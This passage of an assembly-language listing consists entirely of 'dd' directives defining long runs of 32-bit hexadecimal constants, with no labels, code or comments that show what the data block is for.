		dd 17E5CFBDh, 4A862A98h, 0BC02695Dh, 74417F48h,	9D180862h
		dd 307D3A28h, 8A484C9Bh, 4E962060h, 13A69D28h, 0C4E9274Ch
		dd 0F11989D1h, 16C274h,	3A88A78Ah, 213A1461h, 504EC115h
		dd 5613989Dh, 0D604AA27h, 75A1AB89h, 9D70EB22h,	275E3AD8h
		dd 8D064EBAh, 0FE13AFh,	9846B6DBh, 4239E5D2h, 32080BCCh
		dd 1CCC8C47h, 0C473E651h, 69112399h, 283E408Eh,	0F3FACD42h
		dd 353312CAh, 0C15FDBBDh, 9CF9069Dh, 71C4DE9Bh,	92CA5175h
		dd 0B9AD9E30h, 0FFF75393h, 8197027Eh, 862182CCh, 0A8D1E0BCh
		dd 0A427444Dh, 29890048h, 3A99144h, 0AA2E461h, 42B0E471h
		dd 0F2347920h, 4F179B29h, 9BC8495Ch, 0D70B946Ah, 162E12EBh
		dd 711AA4F5h, 0A1539742h, 0DE19BA1Bh, 0A1D8CFB9h, 0DA34F762h
		dd 0BAF68851h, 84DBEB96h, 0E8202291h, 0FE966898h, 57369565h
		dd 1C54C005h, 0FAE02A49h
		dd 80C30A14h, 492791C2h, 0F977F570h, 0E0C2AFE2h, 0FF0C727Fh
		dd 0C6435F82h, 0CFDC80DFh, 7124685h, 2035EE9Ch,	319740ABh
		dd 0EC524D5Ch, 0D2BB94Ah, 8861AE37h, 0CF9A1502h, 5E416890h
		dd 3E6E1B9h, 0EA87D757h, 51E3CFF4h, 87048B66h, 5FD5CA6h
		dd 193F23A6h, 761F157Eh, 1F84E0E0h, 4DA38A85h, 0F5C65028h
		dd 8BD34792h, 0D60E583Dh, 7B40DD71h, 6ECB0F70h,	41909B98h
		dd 5AAA161Ah, 0E418E9C4h, 5B70188Ah, 4D1E561h, 8D2AFE44h
		dd 0F32A401Dh, 0C4305ECEh, 0C4AC19AEh, 0B649BDB5h, 0DC8FFEBAh
		dd 7FCC04ABh, 0B5B9E36Fh, 728B29FBh, 2EB7DFE6h,	814708C5h
		dd 2A5334DFh, 0F2EB7C1Ah, 543FAA8Fh, 3C404DC5h,	0BA1FA063h
		dd 0C818C1D9h, 43FEE4A4h, 1F83B21h, 0E8BF9441h,	0E6FA85E0h
		dd 0C2F5C824h, 0FB6A56E5h, 429CFE1h, 0D18007FCh, 9153254Dh
		dd 0BFA9A7FCh, 324B73C4h, 53721537h, 0C9EF891h,	198A866Eh
		dd 2A211C01h, 0AB94EA2h, 0C823940Ah, 12275836h,	28081EC5h
		dd 2657E510h, 0FC9F8064h, 714CC1F5h, 0A7FD74A0h, 86220578h
		dd 6D1B4B96h, 0D2CA9F1Ch, 0C45FEA5h, 0D4B58189h, 0A6250611h
		dd 0D36F00C0h, 0C9557517h, 150004A0h, 0DAB3D68Ch, 0EB2EBC7Dh
		dd 185D8EEBh, 4050DDB9h, 0CEBE765Eh, 1CA1ADF5h,	0FEE3F9D2h
		dd 44DEC05Fh, 7BF6AEEAh, 0EB0B823Ch, 3EF9904Eh,	0DBFAEC76h
		dd 10FC32B1h, 4A146A7Eh, 71F8A1FAh, 9DFFFBE4h, 0BC1743F2h
		dd 8595E6A9h, 356F822Eh, 77FF4574h, 0FD15412Ah,	1106C328h
		dd 0BDD6D24h, 0C3388527h, 4507A3EFh, 246BAC90h,	0BE45702Ch
		dd 0AC42068Fh, 1D713CABh, 5DD1904Dh, 8ABAF862h,	5FFCD23h
		dd 296804D4h, 9556EA62h, 0ACD6B846h, 0EAA69670h, 3FAAB8FCh
		dd 0D4FB2DF6h, 595D6AE3h, 1ABBA00Dh, 0FAF76FB2h, 203794FCh
		dd 0A3593379h, 0DB5F490Dh, 2568E55Dh, 57760226h, 515AC279h
		dd 42A0D74Ch, 0A73807CCh, 968FBBEDh, 0BF0DDAADh, 0D093D3F0h
		dd 83D707F1h, 0F6CB95C7h, 0F432F55h, 491777h, 57951DC5h
		dd 0F289EC5Dh, 0C7BB055Ch, 0A082BF72h, 0A26F77C2h, 0A3AC1516h
		dd 9A4AEF16h, 6B320D2Fh, 2902AAAh, 673BBF1h, 2ABF4B36h
		dd 0E8334DADh, 13F322C7h, 0EDEBC31Ch, 80C9855Fh, 42E0E02Bh
		dd 3182788Ch, 35202CB0h, 0A1B3E97h, 0A54E2639h,	17181418h
		dd 0A585AC03h, 0F1B434CFh, 62EDFB55h, 52074844h, 0EFF31E7Ah
		dd 0ABA68864h, 0EC9A7284h, 3CB37103h, 8128FD9Ah, 37E64453h
		dd 800637D6h, 0C6417951h, 0C36E55B5h, 0D98A1452h, 278F95D4h
		dd 53D5A122h, 0AF8556D9h, 7DFB1C84h, 0FE25004h,	4E0FB2B9h
		dd 0CFFBE812h, 1016A307h, 0BF07D6FCh, 333E6372h, 69FE067Fh
		dd 0A521E82Ah, 0A7E7FDD1h, 251502ECh, 0A4AED6D5h, 885555EFh
		dd 0A7F1A3DEh, 29CFDD04h, 0E5655D10h, 8BF35F92h, 9827FA6Ah
		dd 0D297B38Ch, 5FC5D7F5h, 0AC4074EBh, 0A16034A2h, 1375AE8Dh
		dd 7484F13Fh, 0ECF512BDh, 0C833BA96h, 6866F3DDh, 3588AE8h
		dd 0F4F88413h, 7F8B0907h, 1416DAD5h, 77ADF7C9h,	5C5D9B06h
		dd 1E05CE50h, 91C45E4Ch, 0C26AFBF7h, 94075E14h,	7F1CC8D0h
		dd 1156F2BFh, 0E5D6A262h, 1DE2E427h, 3674CC4h, 5B759CA5h
		dd 0D1C50BD7h, 0FA3A044Ah, 75C2752Bh, 0F07A9436h, 0A0A1F955h
		dd 69D7E34Eh, 0B6A57BB8h, 80FCBDE3h, 557C45EFh,	0BD53220Ah
		dd 921C0EA0h, 81431BACh, 455FC09Ch, 45003D99h, 5E48088Eh
		dd 0BB1FD716h, 0A009032Bh, 38D3CDACh, 19946E3h,	0CC484340h
		dd 0D4BD85B0h, 0A726BEE5h, 76D68EF2h, 5ED60AECh, 0B5330AFCh
		dd 1F8D4021h, 6D051DECh, 1577A267h, 87A076DCh, 1E2A7B2Dh
		dd 8172F03Eh, 9C019124h, 0F5327A1Fh, 6EAD32ECh,	871A188Ah
		dd 0F1785ED9h, 0FBF45E4Ch, 4CD3D1EAh, 0FD8C55EBh, 1AADCC74h
		dd 12A86D76h, 4CC77BBEh, 4D2A7AFBh, 0FC1AFE80h,	13ECC34Ah
		dd 9AAC87Eh, 4108EB9Eh,	9F3FC40Dh, 3678069Eh, 8940FCCCh
		dd 0F933614Ch, 8732B64Ch, 46319A42h, 4FFC8A79h,	5BE25008h
		dd 8A2AD206h, 6281A1B0h, 0F085EC63h, 0BAB5B2F1h, 0B203602Fh
		dd 8C25EE31h, 0EC009070h, 0CA5483B2h, 0AB48437Ah, 6901154Bh
		dd 0E19500F8h, 80D18C87h, 0BBB3DE8Ch, 62A8A422h, 0DB31F8C6h
		dd 2385BAB7h, 790A3B52h, 7BC78652h, 0B8871855h,	0D7586269h
		dd 18A2DBD7h, 1B71D3E6h, 0FDF9EB1Fh, 0E9E52945h, 33EB0B2Bh
		dd 0D69235E2h, 3785983Eh, 630557C6h, 82CB18E5h,	177986CCh
		dd 8C663786h, 70CF814Ah, 0B8D28BA4h, 0C5A85AA0h, 375850C0h
		dd 43088AEDh, 9C97AA9Fh, 0AE390DCCh, 0A7A51B8Ch, 47ED20C8h
		dd 850B6A55h, 0E3EC562Dh, 7AA4E67Bh, 47F32466h,	29A09421h
		dd 7F196101h, 0AA5F6F50h, 55F62066h, 0E417104h,	0D2713F23h
		dd 1AC48161h, 9020809Eh, 40F415BCh, 0D48BCE10h,	9A0FF1BFh
		dd 79013001h, 240A5D92h, 87ED5D2Eh, 3E93EB1Bh, 1A23E1D3h
		dd 0C48CB8C3h, 6FE070A8h, 9491B280h, 2184CAD1h,	0D7024AAEh
		dd 0C62E74E5h, 67803129h, 3282CD3Bh, 6432EC49h,	0B6A837A0h
		dd 0A8815D23h, 2D746D61h, 5C5BE610h, 722A4C1Ah,	15E74C5Ah
		dd 510810FCh, 0D08FDFFh, 6FBD9575h, 16ACA07Ah, 6E7250Ah
		dd 6B154A13h, 8A39A0E4h, 0D652D0F6h, 0D4D3FB60h, 4959CA10h
		dd 3A8D4DC4h, 444A8CE3h, 0F8BAA4EDh, 5E0A5CE4h,	541CAEC0h
		dd 14AA62A2h, 31C607EAh, 406AD253h, 88006799h, 0FA51DD88h
		dd 5CBAD606h, 3465B5Fh,	0A4A92D61h, 0F4065659h,	54E5946Ah
		dd 32890D5Bh, 3BD84051h, 261FDC50h, 5CB04AD9h, 664F65C3h
		dd 78CE6CB1h, 0C0EB4FA6h, 0CBC1B26Fh, 4C5264D8h, 179B933Bh
		dd 849AC1A0h, 7686764Dh, 46FA832h, 0F08D9642h, 578C8EC9h
		dd 20770093h, 2AC5DF7h,	44F51310h, 0B28D0FF9h, 0A6D272E3h
		dd 0AB055693h, 9CC924F9h, 884BDFFEh, 2916D534h,	28A7518Dh
		dd 81B5993Fh, 97A530BBh, 8328AF32h, 0D4BC8804h,	0CA46480Dh
		dd 63D0F9Ch, 8D8026CAh,	8602C604h, 866A06B2h, 0E63FC6A1h
		dd 0D1AB4752h, 8D25942Ah, 5A886C45h, 74AF0804h,	0C5F90E09h
		dd 928082EEh, 0FF0F9581h, 468BF1E9h, 676EC71Dh,	66637E27h
		dd 17F69796h, 5842E85Ch, 0CC818493h, 0D77A232Ch, 3975422Ch
		dd 85FFE909h, 34E1CA05h, 2140A9EBh, 1F0D2594h, 0D6047AEEh
		dd 37892336h, 0B980CD03h, 7295B25Eh, 0E162A4D3h, 0E149134Ch
		dd 1A18F75Ch, 0D7948312h, 0B12FD1B9h, 0FBCDE05Ah, 0D6E98150h
		dd 0A160C2ACh, 641669B0h, 2FA27F31h, 4A24BC04h,	9CE86948h
		dd 93ACADD7h, 9FE2EEh, 13888A6Ah, 4D166730h, 7116D2E5h
		dd 94AAE874h, 1331982Fh, 9FC606CAh, 97765FADh, 1803AD9Bh
		dd 0A2D16BA9h, 89429779h, 0F52EA45Fh, 0A84A3368h, 45F9BA9Ah
		dd 85DE0509h, 2EB69346h, 0DB5B68AEh, 531EAD1Fh,	9A0B2EB6h
		dd 307497D8h, 7E39F99Bh, 397A9861h, 6B04A8C0h, 8A03E220h
		dd 0BE6CC69Eh, 30762826h, 6608100Ah, 59191823h,	39900AFAh
		dd 6917A2A4h, 34274F3Dh, 65D55267h, 4251A996h, 0FF0E0B0Fh
		dd 51C85390h, 400A11A1h, 0F056233h, 0B2372405h,	0B7C001D5h
		dd 0EB63FF1Bh, 0CBAA4FDFh, 3285613Ah, 5CBD6103h, 159F7122h
		dd 4B931A1Eh, 70C298BBh, 0A849101h, 3B2B416Ch, 67EB31E9h
		dd 4C3EA98Fh, 2943DCB8h, 3FBB6BAAh, 77677113h, 0B131B435h
		dd 75FDE240h, 0F068501h, 812681A4h, 0FBB25FFFh,	456C00B7h
		dd 0C45B669h, 5497C239h, 8AC26CD7h, 593A7413h, 876C0C5Fh
		dd 86CA8B4Ch, 0E46E0C06h
		dd 9CBACF7Fh, 3617D361h, 0D59543C6h, 0ED2A57A9h, 1C9CFEDDh
		dd 97D6C9Fh, 8FD23A98h,	65C86E1Ah, 0AD91836h, 0D6815DE5h
		dd 0C0ABAC63h, 650B9374h, 0A388A9EFh, 0DB0CD427h, 0DD028332h
		dd 84982BF2h, 5184061Fh, 65412A3Dh, 0D4EA8DA4h,	14140CA8h
		dd 3135F567h, 65C25009h, 7183D505h, 0BBB208E2h,	0D8839628h
		dd 249C5CC2h, 0F5B83A9Ah, 72E9BBA6h, 0D03447AFh, 5F2488EBh
		dd 8BF5212h, 0D63415ACh, 0F0C26670h, 8BBA99A6h,	75C9C2A6h
		dd 704C3A34h, 28923B42h, 0C349B095h, 57EEBF77h,	0DDFE4A12h
		dd 0F0270CAFh, 64068425h, 5540C32Fh, 0F47D1E43h, 7EF72281h
		dd 86047475h, 7BCFC6D2h, 368A92BFh, 11683C55h, 0F48B2344h
		dd 34E96250h, 0C6C1DDA1h, 41DB5832h, 42503142h,	689F0298h
		dd 548ECFBFh, 4FA66306h, 0C1A12F94h, 0A20ABA34h, 0D94AAF70h
		dd 0EBF8FB55h, 6AD13052h, 707D38AEh, 2FDBF9B6h,	6AE638D8h
		dd 0FB7C6CEEh, 69D1E410h, 0AB481804h, 4C100015h, 0C04612AFh
		dd 0A5AABFC1h, 0AFA59E09h, 4001E916h, 412B6F29h, 2BF55B75h
		dd 0FD9EB581h, 0CA82C10Bh, 2448091h, 0D740577Bh, 0DF80AE18h
		dd 0EBA36A17h, 8A9CD526h, 0EF7BC58Eh, 0C87303CAh, 4AEA7238h
		dd 6B87E891h, 24DDBEC2h, 0CA959965h, 0F8614267h, 89F93C1h
		dd 0A304E03Ch, 0CF80831Fh, 8C2FCFF9h, 0A508F1EEh, 4E70AF75h
		dd 0F1346348h, 4EE7405Fh, 4AFEDF44h, 9AC1FDCFh,	946C356Ah
		dd 2501AA17h, 73EAA41Fh, 47FC72EFh, 3E9CAE1Dh, 89319E90h
		dd 0D830AFA3h, 8F80EC31h, 1F42FA46h, 45C5741Bh,	0D08FE10Bh
		dd 77CF6C71h, 7EFD5D4Eh, 620BACDh, 46859C1Fh, 0E7A4259Eh
		dd 40C1286Bh, 5743501Dh, 0D5BB143Eh, 0FBD74A4Ah, 6C62C549h
		dd 0A69B4323h, 21A73D71h, 27FFACC9h, 0A06215Dh,	0F2CCD4CBh
		dd 69F41CA3h, 16E7A99Ch, 0BB63445Dh, 1E73C234h,	0EB57965Ah
		dd 0A019EED2h, 0B11B82B0h, 17DC1FCDh, 0FDAAE050h, 0FA2AB3B3h
		dd 1D1645A1h, 0D7813F12h, 5C7E87EBh, 620607C5h,	177C0B82h
		dd 3FF7F840h, 695DBFD8h, 8BB482EFh, 94F3D30Dh, 0C64D8087h
		dd 0C4053E49h, 0DD7DA3A2h, 0CAE25BBCh, 7487C992h, 1AD42597h
		dd 277D6C4Ah, 1D08D048h, 70D4F76Dh, 0F61AABBBh,	94CD0443h
		dd 8055B2AAh, 67AA317Dh, 2E93A64Eh, 0EE88B883h,	97353AB2h
		dd 5A444457h, 9E54C94Bh, 9879177Bh, 99D200B5h, 0C3CBE916h
		dd 383FEB4Ah, 46A6BA59h, 23CE61A1h, 0C885A609h,	6DA3B994h
		dd 5DE0A09Ch, 2D1CA57h,	959170EFh, 4244F0DCh, 7B852188h
		dd 59B065DCh, 0D9EB55D6h, 93572741h, 0B98EC3F1h, 1FC36D20h
		dd 0E57D9A19h, 0B327E280h, 0E8AEE12Bh, 6A4A8CF0h, 0FF64EC25h
		dd 0E21982B6h, 4CBDF92Eh, 0DD85A0ADh, 92937355h, 7FCAAA32h
		dd 35CAE2E8h, 0ABE2419Eh, 4D6B0464h, 5031EA70h,	4558F3ECh
		dd 6C8C2BFFh, 0A2EADAF1h, 94204E47h, 0EE6C140Dh, 6ABBC935h
		dd 62A122D5h, 60244F74h, 368A2047h, 0C87DF031h,	44BD365Dh
		dd 0C5018175h, 572A3167h, 6754A331h, 874F6AABh,	441CA83Ch
		dd 0ACCB5C49h, 3C8AD351h, 29BF2872h, 36B3E448h,	0DD257B8Bh
		dd 0E2FB0B23h, 0D8BB5609h, 4707D172h, 0BE1EB573h, 0B39CE7AEh
		dd 4B435835h, 0D77112B7h, 32056B33h, 0F556453h,	5F257031h
		dd 0C6969776h, 6C75D268h, 0D597391Fh, 0AB2A76E6h, 1317654h
		dd 3F2ADCF5h, 0BB7AB934h, 71FD202Bh, 0F8E75D8Bh, 0ABB7D25h
		dd 4D163BA6h, 22174A55h, 5A432CE3h, 7EBD3727h, 517513E8h
		dd 12876B21h, 2ED4EEA2h, 0D91C472Bh, 0AD002CD1h, 44B88585h
		dd 0E5612D6Ch, 0DE66240Ch, 3774AFA2h, 0F8DA2950h, 0C818881Dh
		dd 15C0FED0h, 9BD67642h, 0C3EC30DAh, 0C778FA0Fh, 284383ABh
		dd 0E28D3738h, 8BDF409Ch, 5AA4002Dh, 846D750Fh,	7A761689h
		dd 2DFB7795h, 0E9971DE3h, 0BE1B85DFh, 0B82648A9h, 2308F85Ch
		dd 85D6A440h, 509B4AC8h, 0ACFC88FAh, 3912F014h,	993E9716h
		dd 16F5C16Fh, 0F77A9A10h, 0A6CBD83Fh, 9779E62Fh, 954FDA21h
		dd 0AD2BFC71h, 273B39EBh, 0CB52F054h, 0AA6BC2D5h, 5E5F2545h
		dd 0B7AFEA27h, 0B609707Dh, 48B15DBEh, 19165164h, 1DB8DB40h
		dd 0B2BE4485h, 34992200h, 0CE2B4118h, 0A1BA8828h, 0A7912220h
		dd 817580AAh, 0F67C2720h, 0B32083AAh, 7C4DFF6Bh, 0F17761E4h
		dd 0F19B3294h, 75AC0547h, 0B4140421h, 9758242Ch, 9EFA0520h
		dd 0A14ADE2Eh, 613F628Eh, 8B223970h, 39F24003h,	7D011D0Eh
		dd 0FA64EBF3h, 3B80265Ch, 48BC9815h, 0A07C493Ch, 225F540Fh
		dd 8051A9C8h, 0D57A6327h, 8911F4CEh, 0E8A7E626h, 0B5DA847Fh
		dd 0B930BD7Dh, 0F44A648Fh, 51F61482h, 4A999823h, 298F8796h
		dd 0D49E5AABh, 17E15C65h, 774C4D37h, 0CA07221Ah, 0F911ACA3h
		dd 592C364Ch, 47E6C5D1h, 1E54A2BBh, 0D786498Ah,	6F085014h
		dd 0E7F5FDA8h, 0D2DC054Ah, 0C1F49509h, 0D78DBA19h, 0D675FBE1h
		dd 6364C703h, 0E51D756Dh, 21641C7Ah, 808910B2h,	0B0228052h
		dd 6DF75044h, 0C3D15C1Ch, 0A2C241C6h, 0ECDF015Eh, 0E0D11C5Fh
		dd 2BFE8A78h, 0F49D307Eh, 912926ABh, 8B8BF2AEh,	7108595Ah
		dd 2C2BC8CEh, 0CC0D4220h, 0C274D700h, 0EE0FC3A9h, 0E27D430Bh
		dd 0A70E87D9h, 0EFDF3E7Ah, 0C597D4BBh, 0CED9C1F1h, 9C67E00Bh
		dd 10816817h, 7D0A01B3h, 5E48F225h, 0E6E495A9h,	1F8BA44Bh
		dd 846D2319h, 0E38E598Ah, 59BD7D6Dh, 4F3CA930h,	0EAFAE57Ch
		dd 357C13B9h, 83E654C3h, 0A3095FDFh, 0FA54813Ah, 22954A22h
		dd 23ABD97Dh, 0C864A0CAh, 0F92896C3h, 0C33AAC52h, 0AD885F4Ah
		dd 36BEA2D5h, 0F3CDA3AAh, 2918A3FAh, 0F6A4D872h, 697155F0h
		dd 0A517051Ch, 0A6022855h, 0E156D99Eh, 0DF60AECAh, 38FFF895h
		dd 1A8B067Ah, 0F198DB8Fh, 0FDD2D855h, 1E009DCAh, 0C43D1203h
		dd 0DCC440FFh, 0BA7970A7h, 80AEB622h, 0FA25581h, 6296CF27h
		dd 6F31FD1Fh, 0CF0780D8h, 0F9B83335h, 5851460Dh, 0C4BE7C61h
		dd 4681B4BAh, 0B9A2E028h, 2E900757h, 37FEECC5h,	40D14C05h
		dd 23E151C5h, 7B9542B5h, 93EA4AF8h, 9006F9C6h, 0B2314149h
		dd 19543A53h, 29CB8387h, 0B5D78B3Eh, 2282337h, 8C092AC0h
		dd 0F3644121h, 57B1280Ah, 0E935A69Ah, 4251971Eh, 41090119h
		dd 62ABB497h, 0C83A33D6h, 0A4FC5C09h, 4A033E9Bh, 8A867AE3h
		dd 57904014h, 0D70AC167h, 95D7B431h, 0BA23181Fh, 46496625h
		dd 0CF950703h, 0DFE79B95h, 9AA23BE0h, 0BE53D749h, 7CC2EC97h
		dd 0A1F890C4h, 5D01E809h, 2C2B4552h, 5746640Dh,	0E5E098C4h
		dd 4493E27Ah, 218D4B04h, 620A2BA3h, 1C4742h, 649D8375h
		dd 123E8325h, 0CA27F083h, 0B1619839h, 35114DC0h, 915D790Ah
		dd 43EF7632h, 0D563A2DFh, 0D785D291h, 3EF1842h,	0BE06F519h
		dd 18284E08h, 895A9ACEh, 7D820C2Bh, 57B208BBh, 36FB903Ch
		dd 0E9029BF8h, 7DECD8CAh, 7B8859Bh, 282E3911h, 8D6847AEh
		dd 20BB3054h, 458162h, 48ABA22Eh, 0B020F371h, 3DC6EBADh
		dd 0BEF3CAECh, 5C7EAEACh, 0B2F87997h, 59FD0AF7h, 0F8D82A77h
		dd 748A87E2h, 82FF4578h, 0F4D01C4Eh, 0DB2E4458h, 55E9C4D9h
		dd 0EE4DFDFEh, 1AAD6BC2h, 59FE50Dh, 24612FF5h, 5D7F4841h
		dd 0EBDCFBF5h, 79148EC9h, 0FD5E2FF5h, 84550F8Bh, 7129E02Ch
		dd 5EC6D5B0h, 6D9604B9h, 8A651D05h, 24B17E90h, 2E4C512Bh
		dd 0C2504A13h, 41800557h, 1027C205h, 0FF4A8149h, 520088A6h
		dd 0AAF6D94Ah, 403A73FEh, 8A4A311Ah, 0F74B0CCDh, 0ABE24282h
		dd 393B8DA8h, 0E251D063h
		dd 465852Bh, 819C1F13h,	0AE94A5EDh, 0FF6F39ADh,	0D5A2D07Ah
		dd 4EDC7F8Ch, 918D897h,	31326EA0h, 0A5F385DDh, 6B02AE77h
		dd 0C80E4F3Fh, 4AA0AEE0h, 9AB2CCCDh, 86AF26F3h,	2EF535D3h
		dd 3B8708C6h, 4C12D366h, 17B05903h, 475EDCA9h, 0A4F2AA03h
		dd 0F826C64Ah, 9BECF648h, 32C20B0h, 0E9E843D7h,	8B447555h
		dd 5430781h, 1CA09EA8h,	41441290h, 66132522h, 41D26007h
		dd 0AC772088h, 0FF4001CBh, 750B8D45h, 80D27D71h, 9D93E8EEh
		dd 414647C8h, 0CAEBAC2h, 87880428h, 9B580BA9h, 11ACA03Dh
		dd 81A20B3Fh, 0D012E28Fh, 311746A1h, 4F49F45h, 7E4C006Fh
		dd 602E4A17h, 0DF06A017h, 0E5D19779h, 0C731EEAh, 5D9A15EFh
		dd 0BB430D79h, 85A6902h, 141E8052h, 17DF6084h, 0CFFF2CC9h
		dd 0FB040CC4h, 85A9485Dh, 80698039h, 0CA4924A5h, 0DDC10003h
		dd 2234514Dh, 0B8C95558h, 5D38359Dh, 8B20BE1h, 3C11F536h
		dd 0CC82AAC2h, 7D8D0C72h, 6B1AD503h, 75484936h,	96B480CFh
		dd 66B47D6Eh, 37D31513h, 0DB4F5670h, 659F7EFDh,	0DE66CBADh
		dd 448A4831h, 2E1D5477h, 46B03012h, 6640E656h, 650CEA6Ch
		dd 6C152A0Ah, 0F0D6166Ah, 50505190h, 0F43FBB10h, 6D6862F5h
		dd 1551250h, 80AE79FEh,	0D51502E2h, 9476ACAAh, 9D898C71h
		dd 54C624F5h, 0CE32758Eh, 1FD431BDh, 0D415D5B8h, 2AE11B08h
		dd 0DB2C013Ah, 5BD2BC65h, 0C6B32C6h, 7AE3B395h,	10407B06h
		dd 40CDAA05h, 0BF0BF009h, 47284E6Fh, 540CFF6Dh,	9315BCB7h
		dd 537FC80Ch, 0DFE0899h, 844ED80Fh, 71176065h, 1FC18AF8h
		dd 0E03C0F84h, 572ADA9Dh, 0FEE257F8h, 590A715Dh, 0BBE82117h
		dd 0CE3F9020h, 0ABEAB14h, 54CE4224h, 0DFBD2599h, 1BA351B5h
		dd 0EBBF0E39h, 798913B3h, 4CE17711h, 0DBCAD5FCh, 0B26277EEh
		dd 7D408622h, 4EB01E79h, 0B283297h, 925B1447h, 0E57EE822h
		dd 0BA7FB72h, 0BBB1B794h, 53CB0B12h, 0B425B745h, 0BBDA3AF5h
		dd 38D91490h, 0FD4374F0h, 0B0315A35h, 15B9C023h, 442A5977h
		dd 0A4A0F664h, 0CCA9E4Bh, 8DC4053Ch, 33FDA0EEh,	0A9376816h
		dd 8A8EC594h, 1743574Ah, 0E15FB0D9h, 0C3C59EC2h, 55951B88h
		dd 2BA56C8Ah, 0AEB26AB2h, 0F5AEB9AAh, 0E53B809Dh, 62DEB2F7h
		dd 12C4F2AFh, 557A7571h, 0FBCCA3A7h, 2BEBAE4Eh,	0E0D9377Dh
		dd 0E5D6DEAAh, 9D5CB248h, 5B29A9D4h, 0B1E995E0h, 0E541001Dh
		dd 0DFB8F45Eh, 0D0FD6757h, 0A6DF97ACh, 1F1AB428h, 89069203h
		dd 312C17DAh, 95958EC1h, 22EDB12Eh, 8CECF5B1h, 0C14DEFADh
		dd 8154956Dh, 9552FE19h, 0C4314032h, 2EB9AB81h,	77A8CE83h
		dd 425A9145h, 0E34A041Ch, 2F34C87Ah, 82004C2Ch,	7FA588A5h
		dd 8410AD3h, 6FFDB83Eh,	0C47C5819h, 7AE314B8h, 0D1C61937h
		dd 5F6A8041h, 2174C320h, 6E240C76h, 0EB6F8684h,	0C0C0CA9Fh
		dd 830F1F5h, 374653E4h,	90BB645h, 13B8684h, 727DA557h
		dd 0D8CD643Ah, 76447684h, 923B2CF1h, 2AB0EF45h,	19054864h
		dd 7A9B472h, 0E55950D9h, 0EBACC944h, 0F76CA77Ch, 0E269B0B3h
		dd 0FE2A9E36h, 6B9A2D1Bh, 48BA731Ch, 548E7AEh, 0C3579F22h
		dd 0F5706B8h, 0CAAF3BD7h, 0DC6C4AF6h, 0E3231FA7h, 0CACEA2B3h
		dd 9E557496h, 1EE4AF2Fh, 5E6028D9h, 0A02755DDh,	0E6922CBCh
		dd 83935F6h, 24E9657Ch,	7373FCD4h, 9D1E4548h, 0BCEEDBF0h
		dd 35D8E3BAh, 0DF717F03h, 0E719DF2Bh, 0D38886CEh, 6C41CFA0h
		dd 4042A9BAh, 0FCF7B5D9h, 0C6657482h, 13152E92h, 0A132444h
		dd 0D78246C8h, 0EBA3840Eh, 0CEB82381h, 674A6288h, 32C56DC8h
		dd 0F41AC8A0h, 420F7C49h, 7A8CD881h, 48F0A030h,	3CE820F7h
		dd 2C2E7D3Eh, 9DD3AE2Ah, 0C0E7B3AEh, 3B41E6D1h,	286E03Fh
		dd 1BAC39C3h, 3977CE1Ch, 50A88405h, 0CC904848h,	0A3FD6A2Eh
		dd 360D9941h, 66F89316h, 0BD7E91C0h, 34413477h,	0B4776BEh
		dd 6ACEFD2Eh, 0D6EA6ECBh, 762F1F31h, 7D003177h,	0CFBCD10Fh
		dd 0ED348AEFh, 882AAEAAh, 0EA0D4776h, 3BB44C9Fh, 814A48FEh
		dd 0A4024148h, 0A1CB84A2h, 0D4421242h, 1FF01F70h, 6C421DDAh
		dd 0B57FC482h, 8F7BAB50h, 3C5BAD11h, 82EFBB77h,	289680Ch
		dd 7707C136h, 0CA843BBh, 0AF9276EBh, 0E412745h,	10BB4960h
		dd 0B342A765h, 66CF4B71h, 0B3B8B8h, 0CBE112C9h,	0C45DBB75h
		dd 944B735h, 0DD94DDBBh, 4AFD3AEEh, 5BA2604Ah, 0F6777B76h
		dd 3470AEDFh, 0C10F6ECBh, 8232B262h, 33650379h,	2A45111Dh
		dd 0D4194432h, 6DB32725h, 9BBD9056h, 0CCF529C3h, 136283E2h
		dd 9708C2D8h, 6EC9C6CAh, 55A82943h, 15976B35h, 2EA8D42Bh
		dd 0B4CD5A82h, 335C7D15h, 9F2585E0h, 0FF63BE56h, 9F8065CBh
		dd 6D2C8D4h, 0FC1EA3Fh,	15137899h, 20329A74h, 0C8A365DEh
		dd 3D14EF7Fh, 52E1F842h, 1739887Eh, 0DABE7484h,	202913A9h
		dd 3439EB3h, 8AEEF52Dh,	0B41DEDFFh, 32B41505h, 715591Ah
		dd 42EEADBFh, 0FF049F97h, 2B6553D1h, 80ACEB5Fh,	70F8E1ACh
		dd 0B82E9111h, 0D413B203h, 1954AA0Fh, 1BA4081Fh, 0EA91F010h
		dd 3F5DD557h, 0B5083064h, 92C863B2h, 3F602442h,	638A10A2h
		dd 0E4EAE190h, 900D20E7h, 1EA9A461h, 0A93B5B7Eh, 0B244177Eh
		dd 0B26B3F11h, 5455D1B6h, 192E234Eh, 4915A067h,	0D0978EF3h
		dd 7C45C967h, 0DD9074D1h, 0A8B87FCEh, 0EE5974C0h, 0BB395238h
		dd 19E2EFBBh, 0BCDDDE5Eh, 0AFB2C4A2h, 418D126Ch, 8D5221C0h
		dd 0B53C3BB1h, 0D087EAACh, 48A687A8h, 48BA238Bh, 0DDF59390h
		dd 0E72B4745h, 0C77EAB2Ch, 0E05DA710h, 644478B2h, 5F9741A0h
		dd 0F0DDAFB2h, 0EB2CB4C8h, 183178D3h, 0AFFD72D5h, 9BBAB08Dh
		dd 5BBFDC70h, 5DCB0CC8h, 91FB75F1h, 0D83A0B12h,	0D8C1C14Dh
		dd 43CFC019h, 72D39DA0h, 0A72B5054h, 7EFB4DE8h,	0C0C98A6Bh
		dd 0E0AE18D3h, 0BE0AD012h, 0F8FBF83Ah, 0CD561A85h, 2FCF7DA8h
		dd 9CB4AB87h, 5514B564h, 40A70D46h, 3AF43683h, 0E3E81C68h
		dd 122A150Eh, 19045E1Ah, 3264A201h, 636B4C8Dh, 9B3D52B6h
		dd 0AE91D0CAh, 0C9CC3055h, 51EBB3CCh, 0E0841F1Ah, 0CFE5C13Ah
		dd 0CDC66408h, 68D9831Fh, 2B6409D5h, 6D528B33h,	0DFF3CE66h
		dd 0F07C8ACFh, 0F78B8BE7h, 0A67B3056h, 0CD1DEE3Dh, 8B26175Bh
		dd 75979CB4h, 0D74BEF93h, 19BD747Dh, 0D29F0E36h, 85DF77C9h
		dd 5CE2FB37h, 3ED9228Ah, 1ABEEF9h, 0F07C74DBh, 4678EBEEh
		dd 39F8F057h, 1C96A033h, 0C6A23F0Ah, 1855D8A9h,	23334219h
		dd 0AA55D54Ch, 0FD578E3Ah, 42D33691h, 87623BABh, 0BF6978Fh
		dd 0C27536ABh, 3D7E89AAh, 0A47B4927h, 45D0724Ah, 0FC142CF8h
